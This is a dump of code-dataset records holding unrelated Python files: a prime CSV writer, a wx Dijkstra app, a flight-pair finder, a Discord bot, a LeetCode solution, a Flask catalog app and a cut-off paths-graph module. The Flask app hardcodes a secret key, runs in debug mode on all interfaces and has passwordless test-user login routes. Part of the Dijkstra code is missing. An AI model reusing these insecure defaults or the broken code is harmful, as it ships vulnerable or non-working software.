primes\r\n\r\n# Copyright 2020 David Kevin Britt\r\n#\r\n# dkbritt7174@gmail.com\r\n# This file contains the PyPrimeSieve module.\r\n#\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, see .\r\n\r\n\r\n__copyright__ = \"Copyright (C) 1-10-2020 David Kevin Britt\"\r\n__license__ = \"GPL\"\r\n__version__ = \"3.1\"\r\n__maintainer__ = \"David Kevin Britt\"\r\n__email__ = \"dkbritt64118@gmail.com\"\r\n__status__ = \"Beta\"\r\n\r\nST = time.perf_counter_ns()\r\n\r\ndef main() -> None:\r\n \"\"\"Python ppcsv.py (n) and n is the upper limit.\"\"\"\r\n\r\n\r\ndef testforinput():\r\n \"\"\"If no input display example.\"\"\"\r\n\r\n try:\r\n sys.argv[1]\r\n except IndexError:\r\n sys.exit(main.__doc__)\r\n\r\ntestforinput()\r\n\r\nLIMIT_MAX = sys.argv[1]\r\nCSVPRIME_LIST = primes(int(LIMIT_MAX))\r\n\r\n\r\ndef writetocsv():\r\n \"\"\" Writes the numbers to .csv file very quickly.\"\"\"\r\n\r\n with open('PRIMELIST.csv', 'w', encoding='cp932') as file_iter:\r\n writer = fastcsv.Writer(file_iter)\r\n writer.writerow(CSVPRIME_LIST)\r\n writer.flush()\r\n\r\nwritetocsv()\r\n\r\nET = time.perf_counter_ns()-ST\r\nprint()\r\nprint(ET/1000000000, \" seconds\")\r\n","sub_path":"ppcsv.py","file_name":"ppcsv.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"639373560","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 12 10:34:18 2017\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport wx\r\nimport numpy as np\r\nimport copy\r\n\r\nclass Frame1(wx.Frame):\r\n def __init__(self,superior):\r\n wx.Frame.__init__(self,parent=superior,title='最短路算法',pos=(300,200),size=(350,200))\r\n panel=wx.Panel(self)\r\n hsizer=wx.BoxSizer(wx.HORIZONTAL)\r\n rootname=wx.StaticText(parent=panel,id=-1,label='文件路径名',size=(60,20))\r\n hsizer.Add(rootname,0,wx.ALIGN_LEFT,50)\r\n self.rootwhite=wx.TextCtrl(panel,id=-1,value='输入文件路径名',size=(145,20))\r\n hsizer.Add(0,0,wx.EXPAND)\r\n hsizer.Add(self.rootwhite,wx.ALIGN_CENTER,border=50)\r\n self.OK_command=wx.Button(panel,label='确定',size=(40,20))\r\n hsizer.Add(0,0,wx.EXPAND)\r\n hsizer.Add(self.OK_command,border=10)\r\n \r\n hsizer2=wx.BoxSizer(wx.HORIZONTAL)\r\n insertnodename=wx.StaticText(panel,-1,label='输入终结点 ')\r\n hsizer2.Add(insertnodename)\r\n self.insertnode=wx.TextCtrl(panel,-1,size=(100,20))\r\n hsizer2.Add(self.insertnode,0,wx.ALIGN_CENTER_HORIZONTAL)\r\n \r\n outputname=wx.StaticText(panel,-1,'最短路')\r\n self.output=wx.TextCtrl(panel,-1,'',size=(350,20))\r\n \r\n outputdis=wx.StaticText(panel,-1,'最短距离')\r\n self.disoutput=wx.TextCtrl(panel,-1,'',size=(350,20))\r\n \r\n vsizer=wx.BoxSizer(wx.VERTICAL)\r\n vsizer.Add(hsizer)\r\n vsizer.Add((-1,10))\r\n vsizer.Add(hsizer2)\r\n vsizer.Add((-1,10))\r\n vsizer.Add(outputname)\r\n vsizer.Add((-1,5))\r\n vsizer.Add(self.output)\r\n vsizer.Add((-1,2))\r\n vsizer.Add(outputdis)\r\n vsizer.Add((-1,5))\r\n vsizer.Add(self.disoutput)\r\n panel.SetSizerAndFit(vsizer)\r\n panel.Layout()\r\n \r\n panel.Bind(wx.EVT_BUTTON,self.OKclick,self.OK_command)\r\n #panel.Bind()\r\n \r\n \r\n def OKclick(self,event):\r\n address=self.rootwhite.GetValue()\r\n end=int(self.insertnode.GetValue())\r\n dot_num=0\r\n link_num=0\r\n ii=[]\r\n ij=[]\r\n class dot:\r\n dot_id=[0]\r\n dot_accend=[0]\r\n bengin_link=[0]\r\n end_link=[0]\r\n pass\r\n class link:\r\n link_id=[0]\r\n from_dot=[0]\r\n end_dot=[0]\r\n time_consume=[0]\r\n distance_consume=[0]\r\n cost_consume=[0]\r\n pass\r\n \r\n dot_example=dot()\r\n link_example=link()\r\n file=open(address)\r\n 
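# --- Illustrative aside (not part of the dataset records) ---
# ppcsv.py above times the whole run with time.perf_counter_ns() and writes
# the prime list as a single CSV row. A dependency-free sketch of the same
# pattern; a plain sieve and the stdlib csv module replace pyprimesieve and
# fastcsv, whose APIs are assumed rather than shown here:
import csv
import time
from math import isqrt

def primes_upto(n):
    sieve = bytearray([1]) * (n + 1)
    sieve[0:2] = b'\x00\x00'                  # 0 and 1 are not prime
    for i in range(2, isqrt(n) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(range(i * i, n + 1, i)))
    return [i for i, is_prime in enumerate(sieve) if is_prime]

start = time.perf_counter_ns()
prime_list = primes_upto(10_000)
with open('primelist_demo.csv', 'w', newline='') as fh:
    csv.writer(fh).writerow(prime_list)       # one row, like the writerow() above
print((time.perf_counter_ns() - start) / 1e9, 'seconds')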
line=file.readlines()\r\n p1=[]\r\n p2=[]\r\n lj=[]\r\n lj2=[]\r\n Q1={1:0}\r\n Q1_index=[1]\r\n Q1_value=[0]\r\n inf=100000000000000000\r\n k=10000000000000000000000000\r\n #print(line)\r\n\r\n dot_num=line[0]\r\n dot_num.strip('\\n')\r\n dot_num=int(dot_num)\r\n for i in range(1,1+dot_num):\r\n line_str=line[i]\r\n ii.extend(line_str.strip().split(' '))\r\n ii_1=[float(x) for x in ii]\r\n dot_width=int(len(ii_1)/dot_num)\r\n ii_1=np.array(ii_1)\r\n ii_1=ii_1.reshape((dot_num,2))\r\n for i in range(dot_num):\r\n dot_example.dot_id.append(i+1) \r\n dot_example.bengin_link.append(ii_1[i][0])\r\n dot_example.end_link.append(ii_1[i][1])\r\n \r\n link_num=line[1+dot_num]\r\n link_num.strip('\\n')\r\n link_num=int(link_num)\r\n for i in range(2+dot_num,2+dot_num+link_num):\r\n dot_str=line[i]\r\n ij.extend(dot_str.strip().split(' '))\r\n ij_1=[float(x) for x in ij]\r\n link_width=int(len(ij_1)/link_num)\r\n ij_1=np.array(ij_1)\r\n ij_1=ij_1.reshape((link_num,link_width))\r\n for i in range(link_num):\r\n link_example.link_id.append(i) \r\n link_example.from_dot.append(ij_1[i][0])\r\n link_example.end_dot.append(ij_1[i][1])\r\n link_example.time_consume.append(ij_1[i][2])\r\n link_example.distance_consume.append(ij_1[i][3])\r\n link_example.cost_consume.append(ij_1[i][4])\r\n\r\n dot_example.dot_id=[int(x) for x in dot_example.dot_id]\r\n dot_example.bengin_link=[int(x) for x in dot_example.bengin_link]\r\n dot_example.end_link=[int(x) for x in dot_example.end_link]\r\n link_example.link_id=[int(x) for x in link_example.link_id]\r\n link_example.from_dot=[int(x) for x in link_example.from_dot]\r\n link_example.end_dot=[int(x) for x in link_example.end_dot]\r\n\r\n #赋初值,并且做字典\r\n for i in range(934):\r\n lj.append(inf)\r\n lj2.append(inf)\r\n p1.append(-1)\r\n p2.append(-1)\r\n lj[0]=k\r\n lj2[0]=k\r\n lj[1]=0\r\n lj2[1]=0\r\n p1[0]=-5\r\n p2[0]=-5\r\n p1[1]=-1\r\n p2[1]=-1\r\n P1=dict(zip(dot_example.dot_id,p1))\r\n P2=dict(zip(dot_example.dot_id,p2))\r\n Lj=dict(zip(dot_example.dot_id,lj))\r\n Lj2=dict(zip(dot_example.dot_id,lj2))\r\n\r\n #label setting运算\r\n while Q1: \r\n #print(Lj)\r\n i=min(Q1,key=Q1.get) #argmin函数\r\n Q1.pop(i)\r\n a=Q1_index.index(i)\r\n Q1_index.pop(a)\r\n Q1_value.pop(a)\r\n dot_link=[x for x in range(int(dot_example.bengin_link[i]),int(dot_example.end_link[i])+1)]#找出点连的线\r\n for j in dot_link:\r\n if Lj[i]+link_example.cost_consume[j]')\r\n point=int(point)\r\n point=P1_values[point]\r\n if point==-1:\r\n self.output.AppendText('0')\r\n break\r\n\r\n pass\r\napp=wx.App()\r\nframe=Frame1(None)\r\nframe.Show(True)\r\napp.MainLoop()","sub_path":"Dijkstra_app.py","file_name":"Dijkstra_app.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"650822871","text":"#! /usr/bin/python3\n#! 
-*- coding: utf8 -*-\n\nimport fileinput\nimport csv\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\nif __name__ == '__main__':\n\n stdin = fileinput.input()\n data = list(csv.reader(stdin))\n\n header = data[0]\n del data[0]\n\n pairs = {}\n\n format_string = '%Y-%m-%dT%H:%M:%S'\n\n for flight1 in data:\n num1 = flight1[4]\n departure1 = datetime.strptime(flight1[2], format_string)\n arrival1 = datetime.strptime(flight1[3], format_string)\n\n source = flight1[0]\n dest = flight1[1]\n\n for flight2 in data:\n num2 = flight2[4]\n departure2 = datetime.strptime(flight2[2], format_string)\n arrival2 = datetime.strptime(flight2[3], format_string)\n\n source2 = flight2[0]\n dest2 = flight2[1]\n\n\n if (num1 != num2 and\n dest == source2 and\n (timedelta(hours=4) >= departure2 - arrival1 >= timedelta(hours=1))):\n if num2 not in pairs:\n pairs[num2] = [num1]\n else:\n pairs[num2].append(num1)\n\n print(pairs)\n","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13948459","text":"import discord\nfrom discord.ext.commands import Bot\nimport configparser\nimport os\nfrom override import Override\n\nconfig = configparser.ConfigParser()\nconfig.read('./data/config/config.ini')\n\nbot = Override(command_prefix='$', description=config.get('bot', 'description'),\n pm_help=config.getboolean('bot', 'pm_help'), self_bot=not config.getboolean('bot', 'use_token'))\n\ncogs = [f for f in os.listdir(\"./cogs\") if os.path.isfile(os.path.join(\"./cogs\", f))]\n\n\n@bot.event\nasync def on_ready():\n\n print('Logged in as: {}\\n'\n 'Id: {} \\n'\n 'Prefix: {}'.format(bot.user.name, bot.user.id, bot.command_prefix))\n for cog in cogs: \n cog = cog.replace('.py', '')\n try:\n bot.load_extension('cogs.' + cog)\n print(cog)\n except Exception as e:\n print('\\tError: {}: {}'.format(type(e).__name__, e))\n\n\n@bot.event\nasync def on_message(message):\n await bot.process_commands(message)\n\nif not config.getboolean('bot', 'use_token'):\n bot.run(config.get('user', 'email'), config.get('user', 'password'))\nelse:\n bot.run(config.get('bot', 'token'))\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"545512520","text":"\"\"\"\nProblem 1389 - Create Target Array in the Given Order\n\nGiven two arrays of integers nums and index. 
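# --- Illustrative aside (not part of the dataset records) ---
# entry.py above pairs flights when the layover (departure2 - arrival1)
# falls in a 1-4 hour window. The core comparison in isolation, with
# made-up timestamps (chained comparisons work on timedelta values):
from datetime import datetime, timedelta

fmt = '%Y-%m-%dT%H:%M:%S'
arrival = datetime.strptime('2021-06-01T10:00:00', fmt)
departure = datetime.strptime('2021-06-01T12:30:00', fmt)
print(timedelta(hours=1) <= departure - arrival <= timedelta(hours=4))  # True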
Your task is to create target \narray under the following rules:\n\nInitially target array is empty.\n- From left to right read nums[i] and index[i], insert at index index[i] the \n value nums[i] in target array.\n- Repeat the previous step until there are no elements to read in nums and \n index.\n\nReturn the target array.\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def createTargetArray(\n self, nums: List[int], index: List[int]\n ) -> List[int]:\n target = []\n for i in range(len(nums)):\n target.insert(index[i], nums[i])\n return target\n\n\nif __name__ == \"__main__\":\n nums = [0, 1, 2, 3, 4]\n index = [0, 1, 2, 2, 1]\n\n # Should return [0, 4, 1, 3, 2]\n print(Solution().createTargetArray(nums, index))\n","sub_path":"python/problem-1389.py","file_name":"problem-1389.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"417767504","text":"#!/usr/bin/env python\n\n\"\"\"__init__.py: implementation of the Item Catalog project.\"\"\"\n\nimport httplib2\nfrom flask import (\n flash,\n Flask,\n jsonify,\n make_response,\n redirect,\n render_template,\n request,\n session as login_session,\n url_for,\n)\nfrom login_utils import (\n authorization_required,\n facebookOAuth2Connect,\n getNewState,\n googleOAuth2Connect,\n login_required,\n valid_state_token_required,\n)\nfrom db_utils import (\n createCategory,\n createItem,\n getAllCategories,\n getAllItemsInCategory,\n getCategory,\n getItem,\n getSerializedContent,\n removeCategory,\n removeItem,\n updateCategory,\n updateItem,\n)\n\n\napp = Flask(__name__)\n\n\n@app.route('/index/')\n@app.route('/')\ndef index():\n \"\"\"The view for the front page of the site.\n\n Returns:\n The rendered front page.\"\"\"\n return render_template(\n 'index.html',\n user=login_session,\n categories=getAllCategories())\n\n\n@app.route('/categories//')\ndef showAllItemsInCategory(category_id):\n \"\"\"The view for all of the items in a given category.\n\n Args:\n category_id: The id of the category to be displayed.\n Returns:\n The rendered page for the category.\"\"\"\n return render_template(\n 'items.html',\n user=login_session,\n category=getCategory(category_id),\n items=getAllItemsInCategory(category_id))\n\n\n@app.route('/categories//item//')\ndef showItem(category_id, item_id):\n \"\"\"The view for an individual item.\n\n Args:\n category_id: The id of the category containing the item.\n item_id: The id of the item to be displayed.\n Returns:\n The rendered page for the item.\"\"\"\n return render_template(\n 'item.html',\n user=login_session,\n item=getItem(item_id),\n category=getCategory(category_id))\n\n\n@app.route('/categories/new/', methods=['GET', 'POST'])\n@login_required\ndef newCategory():\n \"\"\"The view for creating new categories.\n\n Decorators:\n @login_required: Tests user authentication\n Returns:\n POST: Creates a category and redirects to '/'\n GET: Renders the newCategory page.\n \"\"\"\n if request.method == 'POST':\n createCategory(\n name=request.form['name'],\n description=request.form['description'],\n user_id=login_session['user_id'])\n return redirect('/')\n else:\n return render_template(\n 'newCategory.html',\n user=login_session)\n\n\n@app.route('/categories//edit/', methods=['GET', 'POST'])\n@login_required\n@authorization_required\ndef editCategory(category_id):\n \"\"\"The view for editing a category.\n\n Args:\n category_id: The id of the category to be edited.\n Decorators:\n @login_required: Tests user 
authentication\n @authorization_required: Tests user authorization.\n Returns:\n POST: Updates a category and redirects to '/'\n GET: Renders the editCategory page.\n \"\"\"\n if request.method == 'POST':\n updateCategory(\n category_id=category_id,\n name=request.form['name'],\n description=request.form['description'])\n return redirect('/')\n else:\n return render_template(\n 'editCategory.html',\n user=login_session,\n category=getCategory(category_id))\n\n\n@app.route('/categories//delete/', methods=['GET', 'POST'])\n@login_required\n@authorization_required\n@valid_state_token_required\ndef deleteCategory(category_id, state=None):\n \"\"\"The view for deleting a category.\n\n Args:\n category_id: The id of the category to be edited.\n state: A state-token.\n Decorators:\n @login_required: Tests user authentication\n @authorization_required: Tests user authorization.\n @valid_state_token_required: Tests for a valid state-token.\n Returns:\n POST: Deletes a category and redirects to '/'\n GET: Renders the deleteCategory page.\n \"\"\"\n if request.method == 'POST':\n category_name = removeCategory(category_id)\n flash(\"{name} was deleted.\".format(name=category_name))\n return redirect('/')\n else:\n state = login_session['state'] = getNewState()\n return render_template(\n 'deleteCategory.html',\n state=state,\n user=login_session,\n category=getCategory(category_id))\n\n\n@app.route('/categories//new/', methods=['GET', 'POST'])\n@login_required\ndef newItem(category_id):\n \"\"\"The view for creating a new item.\n\n Args:\n category_id: The id of the category containing the item.\n Decorators:\n @login_required: Tests user authentication\n Returns:\n POST: Creates an item and redirects to the category page.\n GET: Renders the newItem page.\n \"\"\"\n if request.method == 'POST':\n createItem(\n name=request.form['name'],\n description=request.form['description'],\n picture=request.form['picture'],\n category_id=category_id,\n user_id=login_session['user_id'])\n return redirect(url_for(\n 'showAllItemsInCategory',\n category_id=category_id))\n else:\n return render_template(\n 'newItem.html',\n user=login_session,\n category=getCategory(category_id))\n\n\n@app.route(\n '/categories///edit/',\n methods=['GET', 'POST'])\n@login_required\n@authorization_required\ndef editItem(category_id, item_id):\n \"\"\"The view for editing an item.\n\n Args:\n category_id: The id of the category containing the item.\n item_id: The id of the item to be edited.\n Decorators:\n @login_required: Tests user authentication\n @authorization_required: Tests user authorization.\n Returns:\n POST: Updates an item and redirects to the category page.\n GET: Renders the editItem page.\n \"\"\"\n if request.method == 'POST':\n item_name = request.form['name']\n updateItem(\n item_id=item_id,\n name=item_name,\n description=request.form['description'],\n picture=request.form['picture'])\n flash(\"{item} updated.\".format(item=item_name))\n return redirect(url_for(\n 'showAllItemsInCategory',\n category_id=category_id))\n else:\n return render_template(\n 'editItem.html',\n user=login_session,\n item=getItem(item_id),\n category_id=category_id)\n\n\n@app.route(\n '/categories///delete/',\n methods=['GET', 'POST'])\n@login_required\n@authorization_required\n@valid_state_token_required\ndef deleteItem(category_id, item_id):\n \"\"\"The view for deleting an item.\n\n Args:\n category_id: The id of the category containing the item.\n item_id: The id of the item to be deleted.\n Decorators:\n @login_required: Tests user 
authentication\n @authorization_required: Tests user authorization.\n @valid_state_token_required: Tests for a valid state-token.\n Returns:\n POST: Deletes an item and redirects to the category page.\n GET: Renders the deleteItem page.\n \"\"\"\n if request.method == 'POST':\n item_name = removeItem(item_id)\n flash(\"{name} deleted.\".format(name=item_name))\n return redirect(url_for(\n 'showAllItemsInCategory',\n category_id=category_id))\n else:\n state = login_session['state'] = getNewState()\n return render_template(\n 'deleteItem.html',\n state=state,\n user=login_session,\n category_id=category_id,\n item=getItem(item_id))\n\n\n@app.route('/catalog.json/')\ndef endpointJSON():\n \"\"\"JSON endpoint with application data.\n\n Returns:\n Application data for categories and items in JSON format.\"\"\"\n return jsonify(data=getSerializedContent())\n\n\n@app.route('/catalog.xml/')\ndef endpointXML():\n \"\"\"XML endpoint with application data.\n\n Returns:\n An XML template populated with application data for categories\n and items.\"\"\"\n response = make_response(render_template(\n 'catalog.xml',\n data=getSerializedContent()))\n response.headers[\"Content-Type\"] = \"application/xml\"\n return response\n\n\n@app.route('/login', methods=['GET', 'POST'])\n@valid_state_token_required\ndef login():\n \"\"\"The view for user login. Users can be authenticated using OAuth 2.0.\n\n Decorators:\n @valid_state_token_required: Tests for a valid state-token.\n Returns:\n POST: Calls the function for the login provider, which returns\n a URL to the page to be redirected to.\n GET: Renders the login page.\n \"\"\"\n # Check if the user is already logged in.\n if 'user_id' in login_session:\n flash(\"You are already logged in. Try logging out before logging in \"\n \"with a different account.\")\n return redirect('/')\n\n if request.method == 'GET':\n state = login_session['state'] = getNewState()\n return render_template(\n 'login.html',\n user=login_session,\n state=state)\n else:\n # Obtain authorization code\n auth_code = request.data\n if request.args.get('provider') == 'google':\n return googleOAuth2Connect(auth_code)\n else:\n return facebookOAuth2Connect(auth_code)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n \"\"\"The view for logging the user out.\n\n Decorators:\n @login_required: Tests user authentication\n Returns:\n POST: Logs out the user and deletes the session, redirecting to the\n front page.\n GET: Renders the logout page.\n \"\"\"\n result = {}\n if login_session['provider'] == 'google':\n # Execute HTTP GET request to revoke current token.\n access_token = login_session['credentials'].access_token\n url = (\"https://accounts.google.com/o/oauth2/revoke?\"\n \"token={}\").format(access_token)\n h = httplib2.Http()\n result = h.request(url, 'GET')\n else:\n facebook_id = login_session['facebook_id']\n # The access token must be included to successfully log out\n access_token = login_session['access_token']\n url = (\"https://graph.facebook.com/{}/permissions?\"\n \"access_token={}\").format(facebook_id, access_token)\n h = httplib2.Http()\n result = h.request(url, 'DELETE')\n\n if result[0]['status'] == '200':\n # Reset the user's session.\n if login_session['provider'] == 'google':\n del login_session['credentials']\n del login_session['gplus_id']\n else:\n del login_session['access_token']\n del login_session['facebook_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n del login_session['user_id']\n\n flash(\"you are 
now logged out\")\n return redirect('/')\n else:\n # For whatever reason, the given token was invalid.\n flash(\"Failed to revoke token, login was unsuccessful.\")\n return redirect('/')\n\n\n@app.route('/login/testuser//')\ndef loginTestUser(user_id):\n \"\"\"A view for testing. Allows the tester to create testusers, and login as\n testusers that have already been created.\n\n If you want to use the testusers you simply visit a URL that conforms with\n the route of this function, and the user will be logged in, and be created,\n if it didn't exist already.\"\"\"\n if app.debug:\n login_session['username'] = 'Testuser{}'.format(user_id)\n login_session['email'] = 'testuser{}@gmail.com'.format(user_id)\n login_session['picture'] = 'http://fillmurray.com/200/200'\n login_session['user_id'] = user_id\n flash(\"you are now logged in as %s\" % login_session['username'])\n else:\n flash(\"You are not in debug mode.\")\n\n return redirect('/')\n\n\n@app.route('/logout/testuser/')\ndef logoutTestUser():\n \"\"\"A view for testing. Allows the tester to log out from a testuser\n session.\n\n Visit the URL to log out a testuser and delete the session.\"\"\"\n if app.debug:\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n del login_session['user_id']\n flash(\"You are now logged out.\")\n else:\n flash(\"You are not in debug mode.\")\n\n return redirect('/')\n\n\nif __name__ == '__main__':\n app.secret_key = 'v0KrmNKYvijMGOoURh6o'\n app.debug = True\n app.run(host='0.0.0.0', port=80)\n","sub_path":"catalog/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203687077","text":"\"\"\"\r\nCompute cycle-free paths graphs for use in sampling causal paths.\r\n\r\nA *paths-graph,* say *G_n*, has the property that every node in *G_n* lies on a\r\npath of length n from source to target. These paths may not be cycle-free. This\r\nmodule transforms *G_n* into a new graph *G_cf* such that in *G_cf* every node\r\nlies on a cycle-free path from the source to a target. Note that it will *not*\r\nbe the case, despite the misleading name *G_cf*, that *G_cf* contains *only*\r\ncycle-free paths. However, we are able to \"easily\" sample cycle-free paths from\r\n*G_cf* without any backtracking using metadata attached to each node in *G_cf*.\r\n\r\nThe algorithm is described further in :py:func:`cycle_free_paths_graph`, below.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport itertools\r\nfrom copy import copy, deepcopy\r\nimport networkx as nx\r\nfrom indra.explanation import paths_graph\r\n\r\n\r\ndef cycle_free_paths_graph(pg, source, target, path_length):\r\n \"\"\"Compute a cycle free paths graph.\r\n\r\n Starting from the \"raw\" (i.e., containing cycles) paths graph, and given a\r\n target path length n, the algorithm iterates over each \"level\" in the\r\n graph 0 <= k <= n where level 0 consists only of the source node and level\r\n n consists only of the target.\r\n\r\n Each level k consists of a set of nodes, X; we examine each node x in X and\r\n identify the subset of nodes that are reachable in both the forward and\r\n backward directions from x. 
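# --- Illustrative aside (not part of the dataset record) ---
# The docstring above describes, for each node x of a leveled paths graph,
# the sets of nodes reachable forward and backward from x. With networkx
# those reach sets are just descendants/ancestors; a toy sketch (the small
# graph and its (depth, name) node labels are made up):
import networkx as nx

g = nx.DiGraph([((0, 'S'), (1, 'A')), ((1, 'A'), (2, 'B')), ((1, 'A'), (2, 'T'))])
x = (1, 'A')
print(nx.descendants(g, x))  # nodes on paths leaving x
print(nx.ancestors(g, x))    # nodes on paths entering x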
If any of the nodes in the forward reach\r\n subgraph contain x itself (but at a different depth), this represents a\r\n cyclic path back through x that is then pruned.\r\n\r\n Each node x therefore defines its own subgraph of cycle free paths, g_x.\r\n After iterating over all x in X, we combine these subgraphs into the\r\n (in-progress) cycle free paths graph H_k. H_k therefore consists of the\r\n superset of nodes of all the subgraphs g_x for level k. When merging these\r\n subgraphs we prevent the re-introduction of cyclic paths by annotating each\r\n node in the graph with a list of \"tags\". The tags for any given node\r\n consist of a list of nodes lying at prior (upstream) levels. Therefore\r\n during sampling, transitions from an upstream node to a downstream node are\r\n only permissible if all nodes in the path up to a certain level are\r\n contained in the tag set of the downstream node.\r\n\r\n Parameters\r\n ----------\r\n pg : networkx.DiGraph()\r\n \"Raw\" (contains cycles) paths graph as created by\r\n :py:func:`indra.explanation.paths_graph.paths_graph`.\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n path_length : int\r\n Desired path length.\r\n\r\n Returns\r\n -------\r\n tuple : (networkx.DiGraph(), dict)\r\n The initialized, not-yet cycle free paths graph consists of the\r\n paths graph remaining after cycles through the source or target\r\n nodes are removed. The dict represents an initial set of tags\r\n defining the permissible forward nodes from a given node (i.e.,\r\n those nodes lying on a cycle free path).\r\n \"\"\"\r\n # Initialize the cycle-free paths graph and the tag dictionary\r\n dic_PG = {0: _initialize_cfpg(pg, source, target)}\r\n round_counter = 1\r\n # Perform CFPG generation in successive rounds to ensure convergence\r\n while True:\r\n print(\"Starting round %d\" % round_counter)\r\n print(\"Level 0: %d nodes, %d edges\" % (len(dic_PG[0][0]),\r\n len(dic_PG[0][0].edges())))\r\n for k in range(1, path_length):\r\n # Start by copying the information from the previous level\r\n H = dic_PG[k-1][0].copy()\r\n tags = deepcopy(dic_PG[k-1][1])\r\n # Check if we have already detected there are no cycle free paths.\r\n # If so just propagate this information.\r\n if not H:\r\n dic_PG[k] = dic_PG[k-1]\r\n else:\r\n # Identify the nodes at level k in G_(k-1)\r\n X = [v for v in H.nodes_iter() if v[0] == k]\r\n # We will track the (g_x, tags_x) pairs contributed by each x\r\n # through dic_X\r\n dic_X = {}\r\n for x in X:\r\n tags_x = {}\r\n g_x_f = _forward(x, H)\r\n g_x_b = _backward(x, H)\r\n g_x = nx.DiGraph()\r\n g_x.add_edges_from(g_x_b.edges())\r\n g_x.add_edges_from(g_x_f.edges())\r\n # Get the nodes in the forward reach set representing cycles\r\n # back through node x, (excluding x at level k)\r\n nodes_to_prune = [v for v in g_x_f\r\n if v[1] == x[1] and v[0] != k]\r\n # If there are no nodes to prune then just add the tag 'x'\r\n # to all the nodes in g_x_f but not to x\r\n g_x_prune = _prune(g_x, nodes_to_prune, source, target)\r\n # If target or x gets pruned then x will contribute\r\n # nothing to G_k\r\n if (target not in g_x_prune) or (x not in g_x_prune):\r\n pass\r\n nodes_to_tag = [v for v in g_x_prune.nodes_iter()\r\n if v[0] > k]\r\n # Otherwise add the tag x to the nodes in the strict\r\n # future of x. 
update dic_X\r\n for v in g_x_prune.nodes_iter():\r\n if v[0] > k:\r\n D = tags[v]\r\n D.append(x[1])\r\n tags_x[v] = D\r\n else:\r\n tags_x[v] = tags[v]\r\n dic_X[x] = (g_x_prune, tags_x)\r\n # We can now piece together the pairs in dic_X to obtain (G_k,\r\n # tags_k)\r\n H_k = nx.DiGraph()\r\n tags_k = {}\r\n for x in X:\r\n h_x = dic_X[x][0]\r\n H_k.add_edges_from(h_x.edges())\r\n for v in H_k.nodes_iter():\r\n t = []\r\n for x in X:\r\n if v in dic_X[x][0]:\r\n tags_x = dic_X[x][1]\r\n t.extend(tags_x[v])\r\n t = list(set(t))\r\n tags_k[v] = t\r\n dic_PG[k] = (H_k, tags_k)\r\n print(\"Level %d: %d nodes, %d edges\" % (k, len(dic_PG[k][0]),\r\n len(dic_PG[k][0].edges())))\r\n if not dic_PG[len(dic_PG)-1][0] or \\\r\n set(dic_PG[0][0].edges()) == set(dic_PG[len(dic_PG)-1][0].edges()):\r\n break\r\n else:\r\n dic_PG = {0: dic_PG[k]}\r\n round_counter += 1\r\n return dic_PG\r\n\r\n\r\ndef _initialize_cfpg(pg, source, target):\r\n \"\"\"Initialize cycle free paths graph data structures.\r\n\r\n Parameters\r\n ----------\r\n pg : networkx.DiGraph()\r\n \"Raw\" (contains cycles) paths graph as created by\r\n :py:func:`indra.explanation.paths_graph.paths_graph`.\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n\r\n Returns\r\n -------\r\n tuple : (networkx.DiGraph(), dict)\r\n The initialized, not-yet cycle free paths graph consists of the\r\n paths graph remaining after cycles through the source or target\r\n nodes are removed. The dict represents an initial set of tags\r\n defining the permissible forward nodes from a given node (i.e.,\r\n those nodes lying on a cycle free path).\r\n \"\"\"\r\n # Identify the initial set of nodes to be pruned. In this initial phase,\r\n # they are simply nodes whose names match the source or target.\r\n nodes_to_prune = set([v for v in pg.nodes_iter()\r\n if (v != source) and (v != target) and \\\r\n ((v[1] == source[1]) or (v[1] == target[1]))])\r\n # Get the paths graph after initial source/target cycle pruning\r\n pg_0 = _prune(pg, nodes_to_prune, source, target)\r\n # Initialize an empty list of tags for each node\r\n tags = dict([(node, []) for node in pg_0.nodes_iter()])\r\n # Add source tag to all nodes except source itself\r\n _add_tag(tags, source, [v for v in pg_0.nodes_iter() if v != source])\r\n return (pg_0, tags)\r\n\r\n\r\ndef _prune(pg, nodes_to_prune, source, target):\r\n \"\"\"Iteratively prunes nodes from a copy of the paths graph.\r\n\r\n We prune the graph *pg* iteratively by the following procedure:\r\n\r\n 1. Remove the nodes given by *nodes_to_prune* from the graph.\r\n 2. Identify nodes (other than the source node) that now have no\r\n incoming edges.\r\n 3. Identify nodes (other than the target node) that now have no outgoing\r\n edges.\r\n 4. Set *nodes_to_prune* to the nodes identified in steps 2 and 3.\r\n 5. 
